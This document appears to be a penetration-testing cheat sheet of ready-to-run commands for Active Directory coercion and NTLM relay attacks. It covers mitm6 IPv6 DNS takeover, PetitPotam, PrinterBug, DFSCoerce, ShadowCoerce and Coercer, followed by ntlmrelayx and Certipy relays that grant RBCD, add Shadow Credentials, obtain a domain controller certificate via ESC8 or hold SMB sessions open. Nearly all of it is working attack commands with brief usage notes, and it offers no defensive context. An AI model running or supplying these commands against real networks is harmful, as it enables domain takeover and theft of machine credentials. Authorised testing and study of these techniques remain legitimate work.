Coercion & mitm6 — Forced Authentication

Force machine accounts to authenticate to you and relay it — PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, Coercer and mitm6, paired with ntlmrelayx / Certipy relay (RBCD, Shadow Credentials, ESC8).

lazyhackers, Jun 2026
mitm6 — IPv6 DNS Takeover (5)

    mitm6 -d corp.local -i eth0
        Spoof DHCPv6 to become the network's IPv6 DNS server (WPAD/auth capture)
        tags: mitm6 ipv6 dns

    mitm6 -d corp.local --ignore-nofqdn
        Ignore DNS queries that lack a FQDN, answering only queries for the target domain: quieter, less breakage
        tags: mitm6 opsec

    mitm6 -d corp.local -hw victim-host
        Restrict spoofing to a single victim host (targeted)
        tags: mitm6 targeted

    impacket-ntlmrelayx -6 -t ldaps://dc01.corp.local -wh attacker-wpad --delegate-access
        Relay the IPv6/WPAD-captured machine auth to LDAPS → configure RBCD
        tags: mitm6 relay rbcd

    impacket-ntlmrelayx -6 -t ldaps://dc01.corp.local -wh attacker-wpad --add-computer
        Relay → add a new computer account (then use it for RBCD)
        tags: mitm6 relay addcomputer

PetitPotam — MS-EFSRPC (3)

    python3 PetitPotam.py 10.10.14.1 10.10.10.1
        Unauthenticated EFSRPC coercion (unpatched DCs); arguments are listener then target
        tags: petitpotam efsrpc unauth

    python3 PetitPotam.py -u user -p Password123 -d corp.local 10.10.14.1 10.10.10.1
        Authenticated coercion (patched DCs require valid creds)
        tags: petitpotam auth

    python3 PetitPotam.py -pipe lsarpc 10.10.14.1 10.10.10.1
        Try an alternate named pipe if efsrpc is filtered
        tags: petitpotam pipe

PrinterBug — MS-RPRN (Spooler) (3)

    printerbug.py corp.local/user:Password123@10.10.10.1 10.10.14.1
        Abuse the Print Spooler RPC to coerce the target to auth to your listener
        tags: printerbug msrprn spooler

    dementor.py 10.10.14.1 10.10.10.1 -u user -p Password123 -d corp.local
        Alternative SpoolSample/PrinterBug trigger
        tags: printerbug dementor

    rpcdump.py @10.10.10.1 | grep -i spool
        Check whether the MS-RPRN (Spooler) interface is exposed first
        tags: enum spooler

DFSCoerce / ShadowCoerce (2)

    dfscoerce.py -u user -p Password123 -d corp.local 10.10.14.1 10.10.10.1
        MS-DFSNM coercion; works even when the Spooler is disabled
        tags: dfscoerce msdfsnm

    shadowcoerce.py -u user -p Password123 -d corp.local 10.10.14.1 10.10.10.1
        MS-FSRVP (VSS) coercion; another no-Spooler path
        tags: shadowcoerce msfsrvp

Coercer — All-in-One (3)

    coercer scan -u user -p Password123 -d corp.local -t 10.10.10.1
        Enumerate which coercion methods/pipes the target actually exposes
        tags: coercer scan

    coercer coerce -u user -p Password123 -d corp.local -l 10.10.14.1 -t 10.10.10.1
        Fire every available coercion method at the target at once
        tags: coercer coerce

    coercer coerce -u user -p Password123 -d corp.local -l 10.10.14.1 -t 10.10.10.1 --filter-method-name EfsRpcOpenFileRaw
        Trigger one specific RPC method only
        tags: coercer filter

Relay Combos (where the coerced auth goes) (4)

    impacket-ntlmrelayx -t ldaps://dc01.corp.local --delegate-access -smb2support
        Relay coerced machine auth to LDAPS → grant RBCD over the victim computer
        tags: relay rbcd ldap

    impacket-ntlmrelayx -t ldaps://dc01.corp.local --shadow-credentials --shadow-target "DC01$"
        Relay → add Shadow Credentials (msDS-KeyCredentialLink) on the DC
        tags: relay shadowcreds

    certipy relay -target http://ca.corp.local -template DomainController
        ESC8: relay coerced DC$ auth to AD CS web enrollment to mint a DC cert
        tags: relay adcs esc8

    impacket-ntlmrelayx -t smb://10.10.10.1 -smb2support -socks
        Relay to SMB and stash the session in a SOCKS proxy for reuse
        tags: relay smb socks